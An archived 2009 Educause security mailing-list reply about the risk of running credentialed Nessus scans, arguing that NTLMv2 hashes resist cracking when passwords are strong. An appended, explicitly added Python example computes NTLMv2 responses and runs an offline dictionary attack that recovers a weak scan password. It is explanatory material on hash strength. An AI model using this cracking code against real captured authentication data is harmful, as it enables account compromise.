Educause Security Discussion mailing list archives
Re: Checking for old web browsers and media plugins
From: Adam Carlson <ajcarlson () BERKELEY EDU>
Date: Wed, 18 Feb 2009 15:28:41 -0800
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Gary,

That is a very good question with a somewhat complicated answer. The short answer is that in my opinion you are not introducing significant risk by running Nessus with credentials as long as the systems you scan are actually under your control.

By default, Nessus uses NTLMv2 for authentication which is considered a "strong" hashing method. This is also used for a lot of non-Nessus Windows connections so most likely your NTLMv2 hashes are already flying around the network. Because NTLMv2 is hard to brute force, this is not a problem as long as your password is strong.

Another concern would be that you scan a system that is not under your control and the system tries to force Nessus to use plaintext/LM authentication. On some Nessus clients there is an easy way to prevent cleartext authentication, but I'm using an older client and I don't see that option (but there is supposed to be a way to do it from a script as well). As long as you control the systems being scanned you shouldn't have to worry about someone forcing a weak authentication method.

As Curt mentioned, you have to weigh the above concerns against the risk of not being aware of unpatched software on your network. I personally am much more concerned about an end user navigating to a dangerous site with an outdated browser than I am someone gaining control of one of my systems or my network and then playing tricks on Nessus to get admin credentials. Chances are if someone has control of a system, they already have admin access and if someone has control of my network it would probably be easier to man-in-the-middle remote desktop.
For more information on using Nessus with credentials, the Nessus folks have a pretty good discussion in this PDF:
http://www.nessus.org/documentation/nessus_credential_checks.pdf

Here is a discussion that occurred on insecure.org on the subject as well where people expressed similar concerns:
http://seclists.org/dailydave/2005/q3/0291.html

Here is a PowerPoint that goes into way too much detail about cracking NTLMv2 but the final slide contains the conclusion that NTLMv2 is strong enough when a good password is chosen:
http://www.blackhat.com/presentations/win-usa-02/urity-winsec02.ppt

Gary Flynn wrote:
> Adam Carlson wrote:
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> > Have you tried running Nessus scans with credentials against Windows systems? When Nessus can connect to the target system's registry and is provided administrator credentials,
>
> I did something similar for a while with the ISS scanner. Then I got nervous. What are the implications of this if the target desktop is running something like pwdump? Does it expose the Nessus administrative password hash?
- --
Adam Carlson
Chief Security Officer
Information Technology
Residential and Student Service Programs
Tel: 510-643-0631
Mobile: 510-220-2477
Email: ajcarlson () berkeley edu

"Most of the things worth doing in the world had been declared impossible before they were done." ~Louis D. Brandeis

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkmcmagACgkQT0QSLt7kiaBNHQCgt+HYTc2NW3EF9pYcNYMlFP0t
pRwAoLnXzrnB4pf3XKgVskzRDS1+Qrxk
=kEsj
-----END PGP SIGNATURE-----
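The point the message above rests on is that what a hostile target (or a sniffer on the path) obtains from a credentialed Nessus scan is an NTLMv2 challenge/response, not the password, and that the only way to get the scan account's password back out of it is to guess candidates offline. The following added example, which is not part of the thread and not Nessus code, computes the NTLMv2 response the client sends (NT hash = MD4 of the UTF-16LE password; NTOWFv2 = HMAC-MD5 keyed with it over UPPER(user)+domain; NTProofStr = HMAC-MD5 over server challenge + blob) and then runs the attacker's dictionary attack against a captured response. The scan account name, domain, challenges, blob contents and wordlist are all constructed for the example; MD4 is implemented inline because hashlib's md4 is frequently unavailable under OpenSSL 3. The weak-password case is recovered, the strong one is not, which is exactly the "as long as your password is strong" condition in the message. The LM/cleartext downgrade the message also mentions is not shown here.

```python
"""NTLMv2 response computation plus an offline dictionary attack against a
captured response.  Added example: all names, challenges and the wordlist
are constructed for illustration, not taken from any real capture."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because hashlib.new('md4') often fails."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = _lrot((a + fn(b, c, d) + X[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate registers for the next step
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """NT hash: unsalted MD4 of the UTF-16LE password (password-equivalent)."""
    return md4(password.encode("utf-16le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) + domain) per MS-NLMP."""
    salt = (user.upper() + domain).encode("utf-16le")
    return hmac.new(nt_hash(password), salt, hashlib.md5).digest()


def ntlmv2_response(password, user, domain, server_challenge, blob):
    """Client side: NTProofStr || blob, as carried in the AUTHENTICATE message."""
    key = ntowf_v2(password, user, domain)
    proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def crack_ntlmv2(user, domain, server_challenge, response, wordlist):
    """Attacker side: everything but the password is in the capture, so each
    candidate is verified by recomputing NTProofStr.  Returns the password
    found, or None if no candidate in the wordlist matches."""
    proof, blob = response[:16], response[16:]
    for cand in wordlist:
        attempt = ntlmv2_response(cand, user, domain, server_challenge, blob)[:16]
        if hmac.compare_digest(attempt, proof):
            return cand
    return None


# Constructed capture: a scanner "nessus_scan" in domain "CAMPUS" authenticating
# to a target that issued an 8-byte server challenge; the blob is a minimal
# NTLMv2_CLIENT_CHALLENGE structure with the timestamp zeroed and no AV pairs.
USER, DOMAIN = "nessus_scan", "CAMPUS"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
BLOB = (b"\x01\x01\x00\x00" + b"\x00" * 4           # RespType, HiRespType, reserved
        + bytes(8)                                  # timestamp (zeroed here)
        + bytes.fromhex("aabbccddeeff0011")         # client challenge
        + b"\x00" * 4                               # reserved
        + b"\x00" * 4)                              # empty AV_PAIR list (MsvAvEOL)
WORDLIST = ["password", "Winter2009", "Password1", "nessus", "scanner"]


def demo():
    """Returns (result for a weak scan password, result for a strong one)."""
    weak = ntlmv2_response("Winter2009", USER, DOMAIN, SERVER_CHALLENGE, BLOB)
    strong = ntlmv2_response("crank-7Dormant!lantern-Velvet", USER, DOMAIN,
                             SERVER_CHALLENGE, BLOB)
    return (crack_ntlmv2(USER, DOMAIN, SERVER_CHALLENGE, weak, WORDLIST),
            crack_ntlmv2(USER, DOMAIN, SERVER_CHALLENGE, strong, WORDLIST))


if __name__ == "__main__":
    print(demo())
```

Each guess costs one MD4 and two HMAC-MD5 calls, so the defender's only lever against an attacker holding a capture is the size of the search space, i.e. the scan account's password; rate limiting or lockout on the target does not apply to an offline attack.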
Current thread:
- Checking for old web browsers and media plugins Bob Bayn (Feb 18)
- <Possible follow-ups>
- Re: Checking for old web browsers and media plugins Dean De Beer (Feb 18)
- Re: Checking for old web browsers and media plugins Gary Flynn (Feb 18)
- Re: Checking for old web browsers and media plugins Adam Carlson (Feb 18)
- Re: Checking for old web browsers and media plugins Gary Flynn (Feb 18)
- Re: Checking for old web browsers and media plugins Curt Wilson (Feb 18)
- Re: Checking for old web browsers and media plugins John Ladwig (Feb 18)
- Re: Checking for old web browsers and media plugins Curt Wilson (Feb 18)
- Re: Checking for old web browsers and media plugins Adam Carlson (Feb 18)
- Re: Checking for old web browsers and media plugins Bob Bayn (Feb 20)